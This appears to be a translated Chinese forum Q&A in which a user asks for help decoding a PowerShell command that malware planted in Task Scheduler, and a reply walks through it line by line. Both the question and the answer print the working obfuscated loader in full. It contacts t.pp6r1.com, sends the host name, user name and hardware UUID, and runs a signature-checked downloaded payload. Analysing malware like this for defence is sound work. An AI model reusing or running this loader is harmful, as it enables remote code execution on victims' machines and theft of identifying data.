我遇到了一个问题,我认为是病毒。它在 TaskScheduler 中创建 PowerShell 脚本。它似乎正在运行 WMIC 和 powershell。它使用以下代码创建任务:
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.pp6'+'r1.com';a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
它在 C:\Windows\System32\WindowsPowerShell\v1.0 中创建一个随机命名的文件(与 powershell.exe 的大小和创建日期相同)。
我已经阻止了它尝试访问的网站,并且我已经删除了几个 WMIC“自动运行”,但它仍然将 DNS 条目更改为 8.8.8.8 和 9.9.9.9。
我正在更换受影响的计算机,但想知道是否有人可以帮助使上述内容可读,以便我可以检查网络中的其他机器是否有痕迹。
或者它是否透露了任何可能有用的信息。
提前致谢。
答案1
powershell脚本很简单,联系网站,下载(加密)payload,执行payload(Iex命令)。
它看起来类似于木马病毒
正如您所见,脚本只是可能已经完成的众多事情之一。
以下是该脚本的简要概述
-c
告诉 powershell 执行以下代码块
function a($u)
{
$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);
$c=$d.count;
if($c -gt 173)
{
$b=$d[173..$c];
$p=New-Object Security.Cryptography.RSAParameters;
$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');
$p.Exponent=0x01,0x00,0x01;
$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
$r.ImportParameters($p);
if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171]))))
{
I`ex(-join[char[]]$b)
}
}
}
创建一个名为 a 的函数,该函数以 URL u 作为参数。它将从 URL 下载一些数据。如果数据足够大,则忽略下部并解密“有效载荷”。检查有效载荷是否良好,然后执行有效载荷(Iex 命令)。
$url='http://'+'t.pp6'+'r1.com';
a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
这会根据您的某些计算机设置将 URL 拼凑在一起,并使用该 URL 调用上面定义的函数。
无论如何,除了您找到的脚本之外,可能还有很多其他事情正在发生。检查我上面链接的 URL,找到一款可以消除威胁的防病毒软件,或者更好的方法是清除并重新安装。如果机器允许远程访问,请不要忘记检查是否有任何帐户被盗用。